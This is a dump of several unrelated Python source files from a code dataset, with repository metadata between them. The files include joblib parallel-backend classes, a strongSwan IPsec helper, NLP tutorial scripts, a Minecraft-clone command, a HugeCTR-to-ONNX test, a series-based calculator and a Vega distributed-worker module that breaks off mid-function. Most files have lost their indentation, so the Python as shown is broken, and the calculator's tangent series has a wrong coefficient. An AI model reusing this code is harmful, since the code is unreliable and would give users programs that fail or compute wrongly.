_DEFAULT_SMOOTHED_BATCH_DURATION = 0.0
def __init__(self):
self._effective_batch_size = self._DEFAULT_EFFECTIVE_BATCH_SIZE
self._smoothed_batch_duration = self._DEFAULT_SMOOTHED_BATCH_DURATION
def compute_batch_size(self):
"""Determine the optimal batch size"""
old_batch_size = self._effective_batch_size
batch_duration = self._smoothed_batch_duration
if (batch_duration > 0 and
batch_duration < self.MIN_IDEAL_BATCH_DURATION):
# The current batch size is too small: the duration of the
            # processing of a batch of tasks is not large enough to hide
# the scheduling overhead.
ideal_batch_size = int(old_batch_size *
self.MIN_IDEAL_BATCH_DURATION /
batch_duration)
            # Multiply by two to limit oscillations between min and max.
batch_size = max(2 * ideal_batch_size, 1)
self._effective_batch_size = batch_size
if self.parallel.verbose >= 10:
self.parallel._print(
"Batch computation too fast (%.4fs.) "
"Setting batch_size=%d.", (batch_duration, batch_size))
elif (batch_duration > self.MAX_IDEAL_BATCH_DURATION and
old_batch_size >= 2):
# The current batch size is too big. If we schedule overly long
# running batches some CPUs might wait with nothing left to do
            # while a couple of CPUs are left processing a few long running
# batches. Better reduce the batch size a bit to limit the
# likelihood of scheduling such stragglers.
batch_size = old_batch_size // 2
self._effective_batch_size = batch_size
if self.parallel.verbose >= 10:
self.parallel._print(
"Batch computation too slow (%.4fs.) "
"Setting batch_size=%d.", (batch_duration, batch_size))
else:
# No batch size adjustment
batch_size = old_batch_size
if batch_size != old_batch_size:
# Reset estimation of the smoothed mean batch duration: this
# estimate is updated in the multiprocessing apply_async
# CallBack as long as the batch_size is constant. Therefore
# we need to reset the estimate whenever we re-tune the batch
# size.
self._smoothed_batch_duration = \
self._DEFAULT_SMOOTHED_BATCH_DURATION
return batch_size
def batch_completed(self, batch_size, duration):
"""Callback indicate how long it took to run a batch"""
if batch_size == self._effective_batch_size:
# Update the smoothed streaming estimate of the duration of a batch
# from dispatch to completion
old_duration = self._smoothed_batch_duration
if old_duration == self._DEFAULT_SMOOTHED_BATCH_DURATION:
# First record of duration for this batch size after the last
# reset.
new_duration = duration
else:
# Update the exponentially weighted average of the duration of
# batch for the current effective size.
new_duration = 0.8 * old_duration + 0.2 * duration
self._smoothed_batch_duration = new_duration
def reset_batch_stats(self):
"""Reset batch statistics to default values.
This avoids interferences with future jobs.
"""
self._effective_batch_size = self._DEFAULT_EFFECTIVE_BATCH_SIZE
self._smoothed_batch_duration = self._DEFAULT_SMOOTHED_BATCH_DURATION
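# --- Hedged illustration (added; not part of joblib) ---
# A standalone sketch of the auto-batching heuristic above: the batch size
# grows while measured batch durations stay under MIN_IDEAL_BATCH_DURATION
# and is halved once they exceed MAX_IDEAL_BATCH_DURATION.
def _simulate_auto_batching(durations, batch_size=1,
                            min_ideal=0.2, max_ideal=2.0):
    for duration in durations:
        if 0 < duration < min_ideal:
            # grow towards the ideal size, doubled to damp oscillations
            batch_size = max(2 * int(batch_size * min_ideal / duration), 1)
        elif duration > max_ideal and batch_size >= 2:
            # shrink to limit stragglers
            batch_size //= 2
    return batch_size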
class ThreadingBackend(PoolManagerMixin, ParallelBackendBase):
"""A ParallelBackend which will use a thread pool to execute batches in.
This is a low-overhead backend but it suffers from the Python Global
Interpreter Lock if the called function relies a lot on Python objects.
Mostly useful when the execution bottleneck is a compiled extension that
explicitly releases the GIL (for instance a Cython loop wrapped in a "with
nogil" block or an expensive call to a library such as NumPy).
The actual thread pool is lazily initialized: the actual thread pool
construction is delayed to the first call to apply_async.
ThreadingBackend is used as the default backend for nested calls.
"""
supports_timeout = True
uses_threads = True
supports_sharedmem = True
def configure(self, n_jobs=1, parallel=None, **backend_args):
"""Build a process or thread pool and return the number of workers"""
n_jobs = self.effective_n_jobs(n_jobs)
if n_jobs == 1:
# Avoid unnecessary overhead and use sequential backend instead.
raise FallbackToBackend(
SequentialBackend(nesting_level=self.nesting_level))
self.parallel = parallel
self._n_jobs = n_jobs
return n_jobs
def _get_pool(self):
"""Lazily initialize the thread pool
The actual pool of worker threads is only initialized at the first
call to apply_async.
"""
if self._pool is None:
self._pool = ThreadPool(self._n_jobs)
return self._pool
class MultiprocessingBackend(PoolManagerMixin, AutoBatchingMixin,
ParallelBackendBase):
"""A ParallelBackend which will use a multiprocessing.Pool.
Will introduce some communication and memory overhead when exchanging
input and output data with the with the worker Python processes.
However, does not suffer from the Python Global Interpreter Lock.
"""
# Environment variables to protect against bad situations when nesting
JOBLIB_SPAWNED_PROCESS = "__JOBLIB_SPAWNED_PARALLEL__"
supports_timeout = True
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel.
This also checks if we are attempting to create a nested parallel
loop.
"""
if mp is None:
return 1
if mp.current_process().daemon:
# Daemonic processes cannot have children
if n_jobs != 1:
warnings.warn(
'Multiprocessing-backed parallel loops cannot be nested,'
' setting n_jobs=1',
stacklevel=3)
return 1
if process_executor._CURRENT_DEPTH > 0:
# Mixing loky and multiprocessing in nested loop is not supported
if n_jobs != 1:
warnings.warn(
'Multiprocessing-backed parallel loops cannot be nested,'
' below loky, setting n_jobs=1',
stacklevel=3)
return 1
if not isinstance(threading.current_thread(), threading._MainThread):
# Prevent posix fork inside in non-main posix threads
if n_jobs != 1:
warnings.warn(
'Multiprocessing-backed parallel loops cannot be nested'
' below threads, setting n_jobs=1',
stacklevel=3)
return 1
return super(MultiprocessingBackend, self).effective_n_jobs(n_jobs)
def configure(self, n_jobs=1, parallel=None, prefer=None, require=None,
**memmappingpool_args):
"""Build a process or thread pool and return the number of workers"""
n_jobs = self.effective_n_jobs(n_jobs)
if n_jobs == 1:
raise FallbackToBackend(
SequentialBackend(nesting_level=self.nesting_level))
already_forked = int(os.environ.get(self.JOBLIB_SPAWNED_PROCESS, 0))
if already_forked:
raise ImportError(
'[joblib] Attempting to do parallel computing '
'without protecting your import on a system that does '
'not support forking. To use parallel-computing in a '
'script, you must protect your main loop using "if '
"__name__ == '__main__'"
'". Please see the joblib documentation on Parallel '
'for more information')
# Set an environment variable to avoid infinite loops
os.environ[self.JOBLIB_SPAWNED_PROCESS] = '1'
# Make sure to free as much memory as possible before forking
gc.collect()
self._pool = MemmappingPool(
n_jobs, initializer=self.limit_clib_threads, **memmappingpool_args)
self.parallel = parallel
return n_jobs
def terminate(self):
"""Shutdown the process or thread pool"""
super(MultiprocessingBackend, self).terminate()
if self.JOBLIB_SPAWNED_PROCESS in os.environ:
del os.environ[self.JOBLIB_SPAWNED_PROCESS]
self.reset_batch_stats()
class LokyBackend(AutoBatchingMixin, ParallelBackendBase):
"""Managing pool of workers with loky instead of multiprocessing."""
supports_timeout = True
def configure(self, n_jobs=1, parallel=None, prefer=None, require=None,
idle_worker_timeout=300, **memmappingexecutor_args):
"""Build a process executor and return the number of workers"""
n_jobs = self.effective_n_jobs(n_jobs)
if n_jobs == 1:
raise FallbackToBackend(
SequentialBackend(nesting_level=self.nesting_level))
self._workers = get_memmapping_executor(
n_jobs, timeout=idle_worker_timeout,
initializer=self.limit_clib_threads,
**memmappingexecutor_args)
self.parallel = parallel
return n_jobs
def effective_n_jobs(self, n_jobs):
"""Determine the number of jobs which are going to run in parallel"""
if n_jobs == 0:
raise ValueError('n_jobs == 0 in Parallel has no meaning')
elif mp is None or n_jobs is None:
# multiprocessing is not available or disabled, fallback
# to sequential mode
return 1
elif mp.current_process().daemon:
# Daemonic processes cannot have children
if n_jobs != 1:
warnings.warn(
'Loky-backed parallel loops cannot be called in a'
' multiprocessing, setting n_jobs=1',
stacklevel=3)
return 1
elif not isinstance(threading.current_thread(), threading._MainThread):
# Prevent posix fork inside in non-main posix threads
if n_jobs != 1:
warnings.warn(
'Loky-backed parallel loops cannot be nested below '
'threads, setting n_jobs=1',
stacklevel=3)
return 1
elif n_jobs < 0:
n_jobs = max(cpu_count() + 1 + n_jobs, 1)
return n_jobs
def apply_async(self, func, callback=None):
"""Schedule a func to be run"""
future = self._workers.submit(SafeFunction(func))
future.get = functools.partial(self.wrap_future_result, future)
if callback is not None:
future.add_done_callback(callback)
return future
@staticmethod
def wrap_future_result(future, timeout=None):
"""Wrapper for Future.result to implement the same behaviour as
AsyncResults.get from multiprocessing."""
try:
return future.result(timeout=timeout)
except LokyTimeoutError:
raise TimeoutError()
def terminate(self):
if self._workers is not None:
# Terminate does not shutdown the workers as we want to reuse them
            # in later calls, but we free as much memory as we can by deleting
# the shared memory
delete_folder(self._workers._temp_folder)
self._workers = None
self.reset_batch_stats()
def abort_everything(self, ensure_ready=True):
"""Shutdown the workers and restart a new one with the same parameters
"""
self._workers.shutdown(kill_workers=True)
delete_folder(self._workers._temp_folder)
self._workers = None
if ensure_ready:
self.configure(n_jobs=self.parallel.n_jobs, parallel=self.parallel)
class ImmediateResult(object):
def __init__(self, batch):
# Don't delay the application, to avoid keeping the input
# arguments in memory
self.results = batch()
def get(self):
return self.results
class SafeFunction(object):
"""Wrapper that handles the serialization of exception tracebacks.
If an exception is triggered when calling the inner function, a copy of
the full traceback is captured to make it possible to serialize
it so that it can be rendered in a different Python process.
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **kwargs):
try:
return self.func(*args, **kwargs)
except KeyboardInterrupt:
# We capture the KeyboardInterrupt and reraise it as
# something different, as multiprocessing does not
# interrupt processing for a KeyboardInterrupt
raise WorkerInterrupt()
except BaseException:
if PY27:
# Capture the traceback of the worker to make it part of
# the final exception message.
e_type, e_value, e_tb = sys.exc_info()
text = format_exc(e_type, e_value, e_tb, context=10,
tb_offset=1)
raise TransportableException(text, e_type)
else:
# Rely on Python 3 built-in Remote Traceback reporting
raise
class FallbackToBackend(Exception):
"""Raised when configuration should fallback to another backend"""
def __init__(self, backend):
self.backend = backend
| [
"[email protected]"
] | |
f7563abdb8f484051174f08311f015a78de85abb | a01e7f87a0088965e2e0a02476d2df12a49a1a18 | /package/vpntfi/build/lib/vpnmodule/lib/ipsec.py | ec9ef5f7c46a4f3932aa7db489e96b7baad3399c | [] | no_license | gsrr/IFT_jerry | 0456a8a1fb98f84ad5c26dc36bdf32e2d85c750c | 4c2f6900dfd7ae7f6b3cc2150b1c1be236b4c95c | refs/heads/master | 2020-04-04T05:30:10.544252 | 2019-08-22T09:12:03 | 2019-08-22T09:12:03 | 48,145,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | import sys
import os
import configLoader
import mcommon
def make_replace_func(src, dst):
def wrap_func(items):
with open(src, "r") as fr:
with open(dst, "w") as fw:
for line in fr.readlines():
line = line.strip()
for key in items.keys():
if key in line:
line = line.replace(key, items[key])
break
fw.write(line + "\n")
return wrap_func
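# Hedged usage sketch (added for illustration; the template paths and the
# "[PSK]" placeholder are assumptions mirroring replacePSK below):
def _example_fill_template():
    fill_secrets = make_replace_func("/tmp/ipsec.secrets.default",
                                     "/tmp/ipsec.secrets")
    fill_secrets({"[PSK]": "example-pre-shared-key"})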
class IPSec:
def __init__(self, conf = "/etc/strongswan/ipsec.conf"):
self.conf = conf
self.clobj = configLoader.ConfigIPSec(cfg=self.conf + ".default")
self.clobj.load()
def getcfg(self):
print self.clobj.cfg
def _add(self, *paras):
key = paras[0]
value = paras[1]
self.clobj.add(key, value)
def _remove(self, *paras):
key = paras[0]
self.clobj.remove(key)
def status(self):
cmd = "systemctl is-active strongswan"
output = mcommon.call_cmdstr(cmd)[0]
return output
def replacePSK(self, *paras):
src = "/etc/strongswan/ipsec.secrets.default"
dst = "/etc/strongswan/ipsec.secrets"
items = {'[PSK]' : paras[0]}
func = make_replace_func(src, dst)
func(items)
def unload(self):
self.clobj.unload(self.conf)
def showconf(self):
os.system("cat %s"%self.conf)
def decor_test(func):
def wrap_func():
obj = IPSec("/etc/strongswan/ipsec.conf")
obj.getcfg()
obj.unload()
obj.showconf()
return wrap_func
@decor_test
def test_ipsec():
pass
def main():
func=getattr(sys.modules[__name__], sys.argv[1])
func()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
04a5ac227ff16d908d6ea9c43ed65181b56820de | 46b432cd3557038c454601367b878f889c9b6a8f | /kiyuna/tutorial07/tutorial07.py | cd07ce259e448005ecafb1d76d2ccac03e4a9643 | [] | no_license | tmu-nlp/NLPtutorial2019 | 84ceec06568fd9d899a686658fb8851466133375 | d77d199c50cd37d70e462209a7bfcd4dee9140a1 | refs/heads/master | 2020-05-14T13:34:05.336594 | 2019-09-25T02:25:41 | 2019-09-25T02:25:41 | 181,814,723 | 1 | 0 | null | 2019-08-01T18:53:54 | 2019-04-17T04:04:06 | Python | UTF-8 | Python | false | false | 478 | py | from train_nn import *
from test_nn import *
import subprocess
train_path = '../../data/titles-en-train.labeled'
train_nn(train_path, layer_num=1, node_num=2, epoch_num=1, λ=0.1)
test_path = '../../data/titles-en-test.word'
out_path = './out.txt'
test_nn(test_path, out_path)
script_path = '../../script/grade-prediction.py'
ans_path = '../../data/titles-en-test.labeled'
subprocess.run(f'{script_path} {ans_path} {out_path}'.split())
''' RESULT
Accuracy = 92.915338%
'''
| [
"[email protected]"
] | |
54af5cd1a521f7e55d1fc43f8010b47de5507d7a | 67325192c1e528a39d457f11e61b480d68826708 | /mods/mcpython/Commands/paststructur.py | 117c93e349a2e464fbdd360aea9102a06eae33c7 | [
"MIT"
] | permissive | vashistaarav1611/mcpython-a-minecraft-clone-in-python | 5851b377b54fd2b28c106112c7b18f397b71ab50 | c16cd66f319efdeec4130e1a43f5a857caf1ea13 | refs/heads/master | 2023-02-01T22:48:51.787106 | 2020-12-21T15:02:25 | 2020-12-21T15:02:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | # todo: remove
from . import Command
import structures
import globals as G
class paststructur(Command.Command):
@staticmethod
def getHelp():
return "/paststructur <name> <x> <y> <z>"
@staticmethod
def isCommand(line):
return line.split(" ")[0] == "/paststructur"
@staticmethod
    def getSyntaxError(line, entity, position, chat): # todo: add syntax-system
pass
@staticmethod
def parse(line, entity, position, chat):
sc = line.split(" ")
name = sc[1]
x, y, z = int(sc[2]), int(sc[3]), int(sc[4])
structures.handler.structures[name].past(G.window.model, x, y, z)
Command.handler.register(paststructur)
| [
"[email protected]"
] | |
d86340a6767ed274ae880923b13b4c21609393f6 | 047fbc11cd389e56865034cf473807db8718d92e | /assignment_test.py | 46933b2148fcdc536230cfb6950f6b105b7d6bba | [] | no_license | SDSS-Computing-Studies/002b-basic-math-Sebastianmaudee | 5c07d14dd2f13a6de8674d08c36f614defd1d84a | ae9826096b03ba4cf0d45fa27ec4acf9449570b7 | refs/heads/master | 2023-08-28T23:20:37.346270 | 2021-10-21T21:16:41 | 2021-10-21T21:16:41 | 406,925,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | #! python3
import a1, a2, a3, a4, a5, a6
def test1():
assert a1.answer == 14
def test2():
assert a2.answer == 3
def test3():
assert a3.answer == 10
def test4():
assert a4.answer == 2.5
def test5():
assert a5.answer == 1
def test6():
assert a6.answer == 25
| [
"66690702+github-classroom[bot]@users.noreply.github.com"
] | 66690702+github-classroom[bot]@users.noreply.github.com |
ee9703daa5cc3632e67a2217d830eed7463293cf | 48fab33def7dfaed44dbf0a2c5c148798a10c4c8 | /test/onnx_converter_test/hugectr2onnx_wdl_test.py | 7577b6ee48494f469b7d97b2915f797fb76344de | [
"Apache-2.0"
] | permissive | js-ts/HugeCTR | 787fa22e8643cbfe7c6b9dac4414a70eb37f322c | 085b2e8ad2abaee5578e7bf43b8394d0b8473b58 | refs/heads/master | 2023-08-16T11:29:57.490236 | 2021-10-21T02:31:24 | 2021-10-21T02:31:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,851 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hugectr
from hugectr.inference import InferenceParams, CreateInferenceSession
import hugectr2onnx
import onnxruntime as ort
from utils import read_samples_for_wdl, compare_array_approx
import numpy as np
def hugectr2onnx_wdl_test(batch_size, num_batches, data_source, data_file, graph_config, dense_model, sparse_models, onnx_model_path, model_name):
hugectr2onnx.converter.convert(onnx_model_path, graph_config, dense_model, True, sparse_models)
label, dense, wide_data, deep_data = read_samples_for_wdl(data_file, batch_size*num_batches, slot_num = 27)
sess = ort.InferenceSession(onnx_model_path)
res = sess.run(output_names=[sess.get_outputs()[0].name],
input_feed={sess.get_inputs()[0].name: dense, sess.get_inputs()[1].name: wide_data, sess.get_inputs()[2].name: deep_data})
res = res[0].reshape(batch_size*num_batches,)
inference_params = InferenceParams(model_name = model_name,
max_batchsize = batch_size,
hit_rate_threshold = 0.6,
dense_model_file = dense_model,
sparse_model_files = sparse_models,
device_id = 0,
use_gpu_embedding_cache = True,
cache_size_percentage = 0.6,
i64_input_key = False)
inference_session = CreateInferenceSession(graph_config, inference_params)
predictions = inference_session.predict(num_batches, data_source, hugectr.DataReaderType_t.Norm, hugectr.Check_t.Sum)
compare_array_approx(res, predictions, model_name, 1e-3, 1e-2)
if __name__ == "__main__":
hugectr2onnx_wdl_test(64, 100, "./wdl_data/file_list_test.txt",
"./wdl_data/val/sparse_embedding0.data",
"/onnx_converter/graph_files/wdl.json",
"/onnx_converter/hugectr_models/wdl_dense_2000.model",
["/onnx_converter/hugectr_models/wdl0_sparse_2000.model",
"/onnx_converter/hugectr_models/wdl1_sparse_2000.model"],
"/onnx_converter/onnx_models/wdl.onnx",
"wdl") | [
"[email protected]"
] | |
41d3c3423049d66be5d5a676da6f65fc11ccee96 | 3117852233ea6c2644e723587a7b28d6d6518d95 | /Calculator_Gamma.py | 56834b8c0142138f9ff1356056dec9729eb49cbb | [] | no_license | harishravi121/Pythoncodes | d70059a3b7785d668a4b03f3ec85b0777b33706f | 1d6d6ca0ed6348b6c5d07d27d24668fb567527ca | refs/heads/master | 2023-07-07T11:58:03.741814 | 2023-07-01T08:01:56 | 2023-07-01T08:01:56 | 211,642,477 | 3 | 0 | null | 2020-01-13T06:45:25 | 2019-09-29T10:00:32 | Python | UTF-8 | Python | false | false | 4,117 | py | #The ALU has digital circuits for sum, subtraction, multiplication and comparision.
#The challenge here would be to write the code for division, square root, trignometric and other fuctions
#The following python code just needs python install of 30 MB
x='25'; #2 digit number
y='14'; #2 digit number
#Doing representation of two digit product
product=int(x[1])*int(y[1])+10*(int(x[0])*int(y[1])+int(x[1])*int(y[0]))+int(x[0])*int(y[0])*100
#Doing representation of digit sum and subtraction
add=int(x[1])+int(y[1])+10*(int(x[0])+int(y[0]))
sub=int(x[1])-int(y[1])+10*(int(x[0])-int(y[0]))
#Showing output,
print('Product of ',x,' and' ,y,' ', product)
print('Sum of',x,' and' ,y,' ',add)
print('Subtraction ',x,' and' ,y,' ',sub)
#Dividing x a two digit number by z a single digit number
z='3'# Single digit number
ha=1;# While loop flag
j=0; # Increasing the quotient in the loop until the product exceeds the divisor
while ha:
r=int(x[1])+10*int(x[0])-j*int(z[0]);
if(r<int(z[0])):
ha=0; #Setting the while loop flag to 0 to come out of the loop
j=j+1; #incrementing the quotient until it divides
j=j-1; # Reducing the quotient as we counted one past
#Getting the first decimal digit of the quotient
ha=1;
h=0;
while ha:
r2=r*10-h*int(z[0]);
if(r2<int(z[0])):
ha=0;
h=h+1;
h=h-1;
print('division of ',x,' and' ,z,' ',j,'.',h)
#Finding square root by subtracting successively the contribution from most significant digit.
sq='314';
ha=1;
a=0;
while ha:
luv=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a;
a=a+1;
if luv<0:
ha=0;
a=a-2;
ha=1;
b=0;
while ha:
luv2=int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b;
b=b+1;
if luv2<0:
ha=0;
b=b-2;
ha=1;
c=0;
while ha:
luv3=100*(int(sq[0])*100+int(sq[1])*10+int(sq[2])-100*a*a-(20*a+b)*b)-c*(200*a+20*b+c);
c=c+1;
if luv3<0:
ha=0;
c=c-2;
print('Square root of ',sq , ' ',10*a+b,'.',c)
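#Hedged sanity check (added for illustration): sqrt(314) = 17.72..., so the
#digit-by-digit method above should give a=1, b=7 and first decimal c=7.
assert 10*a+b == 17 and c == 7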
#Maclaurin expansion of all trigonometric and hyperbolic functions
n=100
def hfactorial(n):
s=1;
for j in range(1,n+1):
s=s*j
return s
def hsin(x):
return x-x*x*x/6+x*x*x*x*x/120-x*x*x*x*x*x*x/5040;
def hcos(x):
return 1-x*x/2+1/24*x*x*x*x-x*x*x*x*x*x/720;
def htan(x):
return x+x*x*x/3+2/15*x*x*x*x*x+17/315*x*x*x*x*x*x*x+62/2035*x*x*x*x*x*x*x*x*x;
def h2cos(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j)*(x**(2*j))
return s
def h2sin(x):
s=0.0;
for j in range(n):
s=s+(-1)**j/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2sinh(x):
s=0.0;
for j in range(n):
s=s+1/hfactorial(2*j+1)*(x**(2*j+1))
return s
def h2atanh(x):
s=0.0;
for j in range(1,n):
s=s+1/(2*j-1)*(x**(2*j-1))
return s
def h2atan(x):
s=0.0;
for j in range(1,n):
s=s+(-1.0)**(j+1)/(2*j-1)*(x**(2*j-1))
return s
def h2ln1px(x):
s=0.0;
for j in range(1,n):
s=s+(-1)**(j+1)/j*(x**(j))
return s
def h2erf(x):
    # erf(x) = 2/sqrt(pi) * sum_{j>=0} (-1)^j x^(2j+1) / (j! (2j+1));
    # the series must start at j=0 so the leading x term is included.
    s=0.0;
    for j in range(n):
        s=s+2/math.sqrt(math.pi)*(-1)**j/(2*j+1)/hfactorial(j)*(x**(2*j+1))
    return s
def h2exp(x):
s=0.0;
for j in range(n):
s=s+1.0/hfactorial(j)*(x**(j))
return s
def h2acot(x):
    # acot(x) = pi/2 - atan(x); the atan series starts at j=0 (the x term).
    s=0.0;
    for j in range(n):
        s=s+(-1)**j/(2*j+1)*(x**(2*j+1))
    return math.pi/2-s
def h2cosh(x):
    # cosh(x) = sum_{j>=0} x^(2j) / (2j)!; starting at j=0 keeps the constant 1.
    s=0.0;
    for j in range(n):
        s=s+1/hfactorial(2*j)*(x**(2*j))
    return s
print('pi',h2atan(1)*4.0)
print('e',h2exp(1))
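#Hedged sanity checks (added for illustration, using the stdlib math module
#as a reference; the sample points are arbitrary):
print('sin(pi/6)', h2sin(math.pi/6), 'expected', math.sin(math.pi/6))
print('cosh(0.5)', h2cosh(0.5), 'expected', math.cosh(0.5))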
"""
import numpy as np
import matplotlib.pyplot as plt
def h2gamma(n):
if n==1:
return 1;
if n==0.5:
        return np.sqrt(np.pi);
else:
return (n-1)*h2gamma(n-1);
x=np.arange(0,0.5,0.1)
#plt.plot(x,h2sin(x),x,h2cos(x),x,h2exp(x),x,h2erf(x),x,h2cosh(x),x,h2acot(x),x,h2erf(x),x,h2ln1px(x),x,h2atan(x),x,h2atanh(x))
#plt.show()
"""
| [
"[email protected]"
] | |
caf7ec1a93c4ba7f19938d29664e3db866008a9a | 0add7953d3e3ce2df9e8265102be39b758579753 | /built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/vega/core/trainer/distributed_worker.py | 5d9fc4bf51e66b007308d25784eede866bf0e020 | [
"Apache-2.0",
"MIT"
] | permissive | Huawei-Ascend/modelzoo | ae161c0b4e581f8b62c77251e9204d958c4cf6c4 | df51ed9c1d6dbde1deef63f2a037a369f8554406 | refs/heads/master | 2023-04-08T08:17:40.058206 | 2020-12-07T08:04:57 | 2020-12-07T08:04:57 | 319,219,518 | 1 | 1 | Apache-2.0 | 2023-03-24T22:22:00 | 2020-12-07T06:01:32 | Python | UTF-8 | Python | false | false | 9,223 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Distributed worker for training and evaluating.
Distributed worker is the basic class of TrainWorker and EvaluatorWorker;
it loads the pickled worker sent from the master and runs the train_process
function of each distributed worker on the local node. It also supports a
timeout, killing any worker process that exceeds the configured time.
"""
import os
import copy
import pickle
import subprocess
import logging
import traceback
import json
from vega.core.common.task_ops import TaskOps
from .utils import kill_proc_tree
from vega.core.common import UserConfig
from vega.core.common.class_factory import ClassFactory
from vega.search_space.networks import NetworkFactory
from vega.core.common.utils import switch_directory
from vega.core.common.general import General
from vega.core.common.config import obj2config
class DistributedWorker(TaskOps):
"""Class of Distributed Worker.
This is a distributed worker used to load worker's pickle file,
and run the process of training and evaluating.
:param args: arguments from user config file
:type args: dict or Config, default to None
"""
# original params
__worker_path__ = None
__worker_module__ = None
__worker_name__ = None
# id params
__worker_id__ = 0
__config__ = None
__general__ = None
def __init__(self, args=None):
"""Init DistributedWorker."""
super(DistributedWorker, self).__init__()
# privates
DistributedWorker.__worker_id__ = DistributedWorker.__worker_id__ + 1
self._worker_id = DistributedWorker.__worker_id__
# publics
self.rank = 0
self.world_size = 1
self.worker_addr = ""
self.worker_nccl_port = 16666
self.timeout = int(float(General.worker.timeout) * 60 * 60)
self.__env_config__ = (copy.deepcopy(UserConfig().data),
copy.deepcopy(ClassFactory.__configs__),
copy.deepcopy(ClassFactory.__registry__))
self.__network_config__ = copy.deepcopy(NetworkFactory.__network_registry__)
self.__general__ = obj2config(General)
self.__worker_device_folder__ = os.path.join(self.temp_path, '.worker_device')
if not os.path.exists(self.__worker_device_folder__):
os.makedirs(self.__worker_device_folder__, exist_ok=True)
return
@property
def worker_id(self):
"""Property: worker_id."""
return self._worker_id
@worker_id.setter
def worker_id(self, value):
"""Setter: set worker_id with value.
:param value: worker id
:type value: int
"""
self._worker_id = value
def call_in_gpu(self):
"""Call function based on GPU devices."""
env = os.environ.copy()
sub_pid_list = []
if 'CUDA_VISIBLE_DEVICES' in env:
try:
first_gpu_id = env['CUDA_VISIBLE_DEVICES'].split(",")[0]
env['VEGA_WORKER_PORT'] = '{}'.format(self.worker_nccl_port + int(first_gpu_id))
except Exception:
env['VEGA_WORKER_PORT'] = '{}'.format(self.worker_nccl_port)
if 'PYTHONPATH' in env:
env['PYTHONPATH'] = "{}:{}:{}".format(
env['PYTHONPATH'], self.__worker_path__, os.path.abspath(os.curdir))
elif self.__worker_id__ is not None and self.__worker_path__ is not None:
env['PYTHONPATH'] = "{}:{}".format(
self.__worker_path__, os.path.abspath(os.curdir))
sub_pid = self._subprocess(rank=0, world_size=self.world_size,
env=env, is_backend=False)
sub_pid_list.append(sub_pid)
return sub_pid_list
def call_in_npu(self):
"""Call function based on NPU devices."""
env = os.environ.copy()
sub_pid_list = []
npu_call_path = os.path.join(self.__worker_device_folder__, 'npu')
if not os.path.exists(npu_call_path):
os.makedirs(npu_call_path, exist_ok=True)
if 'PYTHONPATH' in env:
env['PYTHONPATH'] = "{}:{}:{}".format(
env['PYTHONPATH'], self.__worker_path__, os.path.abspath(os.curdir))
elif self.__worker_id__ is not None and self.__worker_path__ is not None:
env['PYTHONPATH'] = "{}:{}".format(
self.__worker_path__, os.path.abspath(os.curdir))
rank_file = env.get('RANK_TABLE_FILE')
with open(rank_file, 'r') as f:
rank_table_json = json.loads(f.read())
if self.__general__.get('dft', False):
env['RANK_SIZE'] = env['ORIGIN_RANK_SIZE']
env['RANK_TABLE_FILE'] = env['ORIGIN_RANK_TABLE_FILE']
else:
env['RANK_SIZE'] = '1'
env['DEVICE_ID'] = rank_table_json['server_list'][0]['device'][0]['device_id']
env['RANK_ID'] = env['DEVICE_ID']
# env['DEVICE_ID'] = rank_table_json['group_list'][0]['instance_list'][0]['devices'][0]['device_id']
env.pop('RANK_TABLE_FILE', None)
with switch_directory(os.path.join(npu_call_path, 'device%s' % env['DEVICE_ID'])):
sub_pid = self._subprocess(rank=0, world_size=1, env=env, is_backend=False)
sub_pid_list.append(sub_pid)
return sub_pid_list
def __call__(self, *args, **kwargs):
"""Call function of distributed worker.
To empty cuda memory, set environ,
and do the subprocess function.
:param *args: positional arguments
:type *args: tuple
:param ** kwargs: keyword argumnets
:type ** kwargs: dict
:return: 0
"""
# empty the cuda memory first.
# set Environment
sub_pid_list = []
if os.environ['DEVICE_CATEGORY'] == 'GPU':
sub_pid_list = self.call_in_gpu()
elif os.environ['DEVICE_CATEGORY'] == 'NPU':
sub_pid_list = self.call_in_npu()
# next we need to deal with the subprocess return status!!!
logging.info("DistributedWorker finished!")
for sub_pid in sub_pid_list:
kill_proc_tree(pid=sub_pid)
logging.info("DistributedWorker subprocess cleaned!")
return 0
def _subprocess(self, rank, world_size, env, is_backend=False):
"""Subprocess on each rank.
Load pickle file into worker class, and use subprocess to run the
train_process function.
:param rank: node rank
:type rank: int
:param world_size: number of total nodes
:type world_size: int
:param env: environ
:type env: dict
:param is_backend: backend or not
:type is_backend: bool
"""
worker_path = self.get_local_worker_path(self.__general__.step_name, self.worker_id)
worker_file = os.path.join(worker_path, 'worker_file_{0}_{1}.pickle'.format(self.worker_id, rank))
with open(worker_file, "wb") as f:
pickle.dump(self, f)
env['RANK'] = "{}".format(rank)
env['WORLD_SIZE'] = "{}".format(world_size)
cmd = "import pickle;f=open('{0}', 'rb');augment = pickle.load(f);".format(worker_file)
cmd = cmd + "from vega.core.common.user_config import UserConfig;"
cmd = cmd + "from vega.core.common.class_factory import ClassFactory;"
cmd = cmd + "from vega.search_space.networks import NetworkFactory;"
